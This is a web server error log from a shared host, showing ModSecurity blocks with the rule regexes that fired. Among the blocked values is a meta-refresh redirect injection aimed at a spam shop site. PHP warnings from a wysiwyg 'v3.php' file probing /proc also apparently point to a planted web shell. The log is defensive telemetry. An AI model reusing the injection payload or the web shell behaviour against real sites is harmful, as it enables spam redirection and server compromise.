[Tue May 12 03:11:26.253880 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
[Tue May 12 03:11:26.254340 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
[Tue May 12 03:11:26.254940 2026] [security2:error] [pid 1709071:tid 1709097] [client 27.78.84.116:50353] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-PrvMumyrWMfSu7qvCwAAAMo"]
PHP Warning:  filesize(): stat failed for /proc/230/task/230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/230/task/230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/230/task/230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/230/task/230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:11:30.570389 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.578980 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.584471 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.588559 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.590447 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.590865 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:30.591567 2026] [security2:error] [pid 1709071:tid 1709106] [client 27.78.84.116:50697] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-QrvMumyrWMfSu7qvDQAAANM"]
[Tue May 12 03:11:32.586874 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://tps:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.592011 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu...."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.642817 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.642981 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.643173 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://tps:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.643662 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:32.644017 2026] [security2:error] [pid 1707624:tid 1707698] [client 27.78.84.116:50932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ-RLOxS7i6i_mT2NLNUQAAAFA"]
[Tue May 12 03:11:56.276162 2026] [authz_core:error] [pid 1730207:tid 1730214] [client 47.128.28.132:35696] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/SimplePie/error_log
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704261/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704261/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704261/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704261/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704261/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704261/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:12:35.572990 2026] [authz_core:error] [pid 1730175:tid 1730200] [client 216.73.216.110:37075] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Symfony/error_log
[Tue May 12 03:12:44.109885 2026] [security2:error] [pid 1691274:tid 1691284] [client 216.73.216.110:59397] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'nTTnn' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: nTTnn found within ARGS:video: best go go bar in bangkok"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.missmandarine.com"] [uri "/news/"] [unique_id "agJ-jFfdQaraX_prmqcllQAAAAc"]
[Tue May 12 03:12:44.110068 2026] [security2:error] [pid 1691274:tid 1691284] [client 216.73.216.110:59397] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/news/"] [unique_id "agJ-jFfdQaraX_prmqcllQAAAAc"]
[Tue May 12 03:12:44.203606 2026] [security2:error] [pid 1691274:tid 1691284] [client 216.73.216.110:59397] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ-jFfdQaraX_prmqcllQAAAAc"]
[Tue May 12 03:12:54.190440 2026] [security2:error] [pid 1709071:tid 1709090] [client 43.167.232.38:40770] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agJ-lrvMumyrWMfSu7qvUgAAAMM"]
[Tue May 12 03:12:58.253504 2026] [security2:error] [pid 1709071:tid 1709104] [client 43.167.232.38:58754] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJ-mrvMumyrWMfSu7qvUwAAANE"], referer: http://www.pole-mobilite-regional.com
[Tue May 12 03:13:00.990201 2026] [security2:error] [pid 1695975:tid 1695992] [client 43.167.232.38:34602] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJ-nNVI9ymHBxup74-Q0AAAAI4"], referer: https://www.pole-de-mobilite-regional.com/
PHP Warning:  filesize(): stat failed for /proc/37/task/37/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/37/task/37/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/37/task/37/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:13:35.986912 2026] [security2:error] [pid 1709071:tid 1709100] [client 43.166.247.155:42422] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJ-v7vMumyrWMfSu7qvawAAAM0"]
[Tue May 12 03:13:50.346078 2026] [security2:error] [pid 1691274:tid 1691280] [client 43.159.63.116:52142] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/relaxation/"] [unique_id "agJ-zlfdQaraX_prmqclyQAAAAM"]
